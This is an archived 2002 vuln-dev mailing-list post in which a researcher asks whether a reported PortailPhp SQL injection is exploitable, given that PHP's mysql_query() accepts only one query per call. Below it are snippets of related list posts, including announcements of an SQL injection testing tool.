Query: BID 6273: PortailPhp SQL Injection Vulnerability.

From: Vinay A. Mahadik (VMahadik@Qualys.com)
Date: 12/27/02

  • Next message: xa6 at g-Con: "ASM OpenBSD"
    Date: Thu, 26 Dec 2002 16:44:44 -0800
    From: "Vinay A. Mahadik" <VMahadik@Qualys.com>
    To: vALDEUx@aol.com, vuln-dev@securityfocus.com, vuldb@securityfocus.com
    
    

    Hi,

    (Posting on vuln-dev too since this has a generic PHP-MySQL SQL
    Injection Vuln question as well).

    I was working on this vulnerability. I came across the following
    advisory on SecurityFocus-BugTraq:

    http://online.securityfocus.com/archive/1/301572

    I find that Php's mysql_query() only allows one SQL query per call. This
    makes the above vuln non-exploitive, I think.

    If not, I would like to know how to inject some SQL content between
    "LIKE '%" and "%'" (without the " s) and get some meaningful/useful
    response from the server through the mysql_query() query. I have tried
    the usual injections, and only get an error from anything that splits
    the above with semicolons.

    Thanks,
    Vinay.



    Relevant Pages

    • Re: SQL Statement with DATE format
      ... quotes in the SQL query. ... When substitution takes place, your SQL ... Whereas without quotes the query would fail because of the unquoted ... injection exploit ...
      (comp.lang.php)
    • Official release of SQL Power Injector 1.2
      ... One of the major improvements is an innovative way to optimize and accelerate the dichotomy in the Blind SQL injection, saving time/number of requests up to 25%. ... Also another great time saver is a new Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context. ... No more time wasted to copy paste the session cookies after you logged... ...
      (Bugtraq)
    • Official release of SQL Power Injector 1.2
      ... One of the major improvements is an innovative way to optimize and accelerate the dichotomy in the Blind SQL injection, saving time/number of requests up to 25%. ... Also another great time saver is a new Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context. ... No more time wasted to copy paste the session cookies after you logged... ...
      (Pen-Test)
    • Official release of SQL Power Injector 1.2
      ... One of the major improvements is an innovative way to optimize and accelerate the dichotomy in the Blind SQL injection, saving time/number of requests up to 25%. ... Also another great time saver is a new Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context. ... No more time wasted to copy paste the session cookies after you logged... ...
      (Security-Basics)
    • Official release of SQL Power Injector 1.1
      ... I have the pleasure to announce that a new version of SQL Power Injector is now officially available on my web site: ... For now it is SQL Server, Oracle and MySQL compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal ... Response of the SQL injection in a customized browser ...
      (Pen-Test)